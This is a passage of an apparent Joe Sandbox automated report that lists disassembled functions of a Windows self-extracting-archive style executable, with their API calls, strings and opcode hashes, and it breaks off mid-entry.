    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
    • String ID:
    • API String ID: 1247370737-0
    • Opcode ID: a8eed178778442eb5165893b371615aa859fdbb9fdabdc4f32f1ab022f33731e
    • Instruction ID: 508180a38eece28a6bf78bee4be606e738a2f9255e44ab4e548949ea362e062e
    • Opcode Fuzzy Hash: a8eed178778442eb5165893b371615aa859fdbb9fdabdc4f32f1ab022f33731e
    • Instruction Fuzzy Hash: DC4148B15083059FD710DF65C88496BBBF9FF88315F40892EF99AD2210E738E589CB62
    Function 0005AD0E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: </p>$</style>$<br>$<style>$>
    • API String ID: 176396367-3568243669
    • Opcode ID: 4ac53ff8cd6c0858da51ca24d08b50c67a8ae5cb5b2e64d6f54319a6d9a00621
    • Instruction ID: 3866175c9edcc6dfa271e0afe576a351634733daf6fa840d08473c93488ad375
    • Opcode Fuzzy Hash: 4ac53ff8cd6c0858da51ca24d08b50c67a8ae5cb5b2e64d6f54319a6d9a00621
    • Instruction Fuzzy Hash: D451272674032395DB706A145C127B773F0DF62793F68462BFD828B5C0FBA58D898272
    Function 0007083D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
    Download Yara Rule
    APIs
    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00070FB2,00000000,00000000,00000000,00000000,00000000,?), ref: 0007087F
    • __fassign.LIBCMT ref: 000708FA
    • __fassign.LIBCMT ref: 00070915
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0007093B
    • WriteFile.KERNEL32(?,00000000,00000000,00070FB2,00000000,?,?,?,?,?,?,?,?,?,00070FB2,00000000), ref: 0007095A
    • WriteFile.KERNEL32(?,00000000,00000001,00070FB2,00000000,?,?,?,?,?,?,?,?,?,00070FB2,00000000), ref: 00070993
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID:
    • API String ID: 1324828854-0
    • Opcode ID: 53d87c3305e0bbf91ca262887492e12afb633ebfa66c80e7cfc3e13adf061b38
    • Instruction ID: 05b3c34d393161d3922ca63100e4fd26edeb6238b289bab333b6252eadd17539
    • Opcode Fuzzy Hash: 53d87c3305e0bbf91ca262887492e12afb633ebfa66c80e7cfc3e13adf061b38
    • Instruction Fuzzy Hash: 1D515F71E00249DFEB10CFA8D885BEEBBF4EB09310F14821AE659F7252D7789941CB65
    Function 00063A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
    Download Yara Rule
    APIs
    • _ValidateLocalCookies.LIBCMT ref: 00063AB7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 00063ABF
    • _ValidateLocalCookies.LIBCMT ref: 00063B48
    • __IsNonwritableInCurrentImage.LIBCMT ref: 00063B73
    • _ValidateLocalCookies.LIBCMT ref: 00063BC8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: 87846964c39529bf45bf37968e462aa8e08c5d891b4da225b6fb93acc21ec567
    • Instruction ID: 87f4c8962fcb684cd6962a9b01ee31f65b579633c69cab157ebb28657e020fdf
    • Opcode Fuzzy Hash: 87846964c39529bf45bf37968e462aa8e08c5d891b4da225b6fb93acc21ec567
    • Instruction Fuzzy Hash: 7F41D034E00208ABCF50DF68C884A9EBBF6AF05324F148155EA18AB393D735AF55CBD1
    Function 0005A965 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
    • API String ID: 176396367-3743748572
    • Opcode ID: 302307eaca0162043736284656ea87a2a6b9bd4d97c03644c75f21418c3cf99d
    • Instruction ID: 1fac199470d0279d25d7a2c688b6d7f2c4eb440103c8c24305322ba309cae35b
    • Opcode Fuzzy Hash: 302307eaca0162043736284656ea87a2a6b9bd4d97c03644c75f21418c3cf99d
    • Instruction Fuzzy Hash: F431402274470166EA34AB549C42BBB73E5EB91321F60852EFD59572C1FBA4AC48C3A3
    Function 0006DA54 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 0006DA18: _free.LIBCMT ref: 0006DA41
    • _free.LIBCMT ref: 0006DAA2
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 0006DAAD
    • _free.LIBCMT ref: 0006DAB8
    • _free.LIBCMT ref: 0006DB0C
    • _free.LIBCMT ref: 0006DB17
    • _free.LIBCMT ref: 0006DB22
    • _free.LIBCMT ref: 0006DB2D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction ID: 24f824784d7310c97104dd2fc1c3ca25e1d0da9311aa03dc709b945aaf4aebcc
    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction Fuzzy Hash: C3112E71F48B04BAD620BBB0CC0BFCB779EAF15700F444C16B29AB6053DA65B5058BA2
    Function 0005F76A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0005F7E5,0005F748,0005F9E9), ref: 0005F781
    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0005F797
    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0005F7AC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
    • API String ID: 667068680-1718035505
    • Opcode ID: b16aedaa0dc6ba972cafac423753559fba519e5e908f1c65b1a14117000d9b41
    • Instruction ID: 6bd9bd7c68369f7cc13dcd55c5239e017ca353d5338ae2b025fbc63d4ff25e99
    • Opcode Fuzzy Hash: b16aedaa0dc6ba972cafac423753559fba519e5e908f1c65b1a14117000d9b41
    • Instruction Fuzzy Hash: 07F02231B4962B9BAB704EA46C8497B62CC8F0E3533200939EE09E3604E32CCD8846D0
    Function 00052789 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
    Download Yara Rule
    APIs
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000527E1
      • Part of subcall function 0004C619: GetVersionExW.KERNEL32(?), ref: 0004C63E
    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00052805
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005281F
    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00052832
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052842
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052852
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion
    • String ID:
    • API String ID: 2092733347-0
    • Opcode ID: 30f38469fbebddc0869c30a23240de2204fcaa256b558b1fdd47cbeb84148659
    • Instruction ID: fc5ab45a857f5c599bb7352a6e9d68a0074dafa4dab8bcd22b66536ec5ba786d
    • Opcode Fuzzy Hash: 30f38469fbebddc0869c30a23240de2204fcaa256b558b1fdd47cbeb84148659
    • Instruction Fuzzy Hash: AA311775108306AFC704DFA8D88499BB7E8FF98704F444A2EF999D3210E734D589CBA6
    Function 00063C7A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,00063C71,00063A2C,00060BE4), ref: 00063C88
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00063C96
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00063CAF
    • SetLastError.KERNEL32(00000000,00063C71,00063A2C,00060BE4), ref: 00063D01
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: c81459ab4b61de4797d11716e35fd6ecee766371275467becb56b20ae7b96200
    • Instruction ID: 76ab15084442c2c2d2254d2cf4c9db706376bc9f283ce530c0a15a21efc21008
    • Opcode Fuzzy Hash: c81459ab4b61de4797d11716e35fd6ecee766371275467becb56b20ae7b96200
    • Instruction Fuzzy Hash: 6201D432A0D7116EF6A42B787C86A6B2A8BFF01775F300329F920B50E5EF165D0457C0
    Function 0006A505 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00083070,00065972,00083070,?,?,00065271,00000050,?,00083070,00000200), ref: 0006A509
    • _free.LIBCMT ref: 0006A53C
    • _free.LIBCMT ref: 0006A564
    • SetLastError.KERNEL32(00000000,?,00083070,00000200), ref: 0006A571
    • SetLastError.KERNEL32(00000000,?,00083070,00000200), ref: 0006A57D
    • _abort.LIBCMT ref: 0006A583
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: d0e9fac7a3144f60ef04bd4c67469cdd25063df30beeaf14a72a55d21a85e307
    • Instruction ID: e271135ee2a0cc922e0194deb9bdcf9c6447ac888d018b0ab97f3ad50d758bf3
    • Opcode Fuzzy Hash: d0e9fac7a3144f60ef04bd4c67469cdd25063df30beeaf14a72a55d21a85e307
    • Instruction Fuzzy Hash: C7F0F432B44901A7E251B3346C0AFAF1A97ABC3721B250014F61AB21A3EF39C9418D66
    Function 0005ED7B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
    Download Yara Rule
    APIs
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005ED87
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005EDA1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005EDB2
    • TranslateMessage.USER32(?), ref: 0005EDBC
    • DispatchMessageW.USER32(?), ref: 0005EDC6
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005EDD1
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
    • String ID:
    • API String ID: 2148572870-0
    • Opcode ID: 7cee77267b4a2bbf9139fe0c9afdc10391480ce0ddeeeb07ec7255f34ee89da7
    • Instruction ID: a4c427f4f5353fe023d66fc77fc23ceab1a750ebb47aa4cefaf788dabbe3d222
    • Opcode Fuzzy Hash: 7cee77267b4a2bbf9139fe0c9afdc10391480ce0ddeeeb07ec7255f34ee89da7
    • Instruction Fuzzy Hash: 42F0C972A01629AADA206BA5DC4DDDB7E7DEF42792B108421BA0AE2051D6389545C6E0
    Function 0005B80C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 238COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0005B699: GetDC.USER32(00000000), ref: 0005B69D
      • Part of subcall function 0005B699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0005B6A8
      • Part of subcall function 0005B699: ReleaseDC.USER32(00000000,00000000), ref: 0005B6B3
    • GetObjectW.GDI32(?,00000018,?), ref: 0005B83C
      • Part of subcall function 0005BACE: GetDC.USER32(00000000), ref: 0005BAD7
      • Part of subcall function 0005BACE: GetObjectW.GDI32(?,00000018,?), ref: 0005BB06
      • Part of subcall function 0005BACE: ReleaseDC.USER32(00000000,?), ref: 0005BB9E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ObjectRelease$CapsDevice
    • String ID: ($Pzv
    • API String ID: 1061551593-912823558
    • Opcode ID: cf6bc10236025dde24a29f5fe89d52fe9a72f22dfd56a43087f54fff3b8d9fd3
    • Instruction ID: ff89665da66db70c804629757f9c17a301d7c41b745e7830045b33f6e426d5b7
    • Opcode Fuzzy Hash: cf6bc10236025dde24a29f5fe89d52fe9a72f22dfd56a43087f54fff3b8d9fd3
    • Instruction Fuzzy Hash: 7A91F271608740AFD621DF25C844E2BBBE8FFC9701F00491EF99AD7261DB75A846CB62
    Function 0004D4D2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00051900: _wcslen.LIBCMT ref: 00051906
      • Part of subcall function 0004CD5C: _wcsrchr.LIBVCRUNTIME ref: 0004CD73
    • _wcslen.LIBCMT ref: 0004D5A4
    • _wcslen.LIBCMT ref: 0004D5EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$_wcsrchr
    • String ID: .exe$.rar$.sfx
    • API String ID: 3513545583-31770016
    • Opcode ID: c3bc7ee2305fdfed3358af45c197e994acdfaf6fb78e05c3146882efbaceab3a
    • Instruction ID: fbf59a24e6530908f3a85991a91e696b8a9f0cb7852e0acaae1002ebfffe5561
    • Opcode Fuzzy Hash: c3bc7ee2305fdfed3358af45c197e994acdfaf6fb78e05c3146882efbaceab3a
    • Instruction Fuzzy Hash: 51414AA2900B1099C772AF348845ABF73F4EF55748B11492FFD869B182EB608D85C35D
    Function 0005DFBA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
    Download Yara Rule
    APIs
    • GetTempPathW.KERNEL32(00000800,?), ref: 0005DFD0
      • Part of subcall function 0004CAA0: _wcslen.LIBCMT ref: 0004CAA6
    • _swprintf.LIBCMT ref: 0005E004
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • SetDlgItemTextW.USER32(?,00000066,00092892), ref: 0005E024
    • EndDialog.USER32(?,00000001), ref: 0005E131
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
    • String ID: %s%s%u
    • API String ID: 110358324-1360425832
    • Opcode ID: 79a0e9f3ec20ce1e57114e859e5842c994c46b4b64043dc4ca7c26e67557129d
    • Instruction ID: 4602befa694db7da0cf7024e5b3777c3084dabbc44e1c76e09275e25dbf17ed3
    • Opcode Fuzzy Hash: 79a0e9f3ec20ce1e57114e859e5842c994c46b4b64043dc4ca7c26e67557129d
    • Instruction Fuzzy Hash: 1B416E75900658AAEF659B60CC45FFF77ECEB04306F4080A6FE49A7051EF749A888F60
    Function 0004CF32 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 0004CF56
    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0004B505,?,?,00000800,?,?,0004B4CA,?), ref: 0004CFF4
    • _wcslen.LIBCMT ref: 0004D06A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
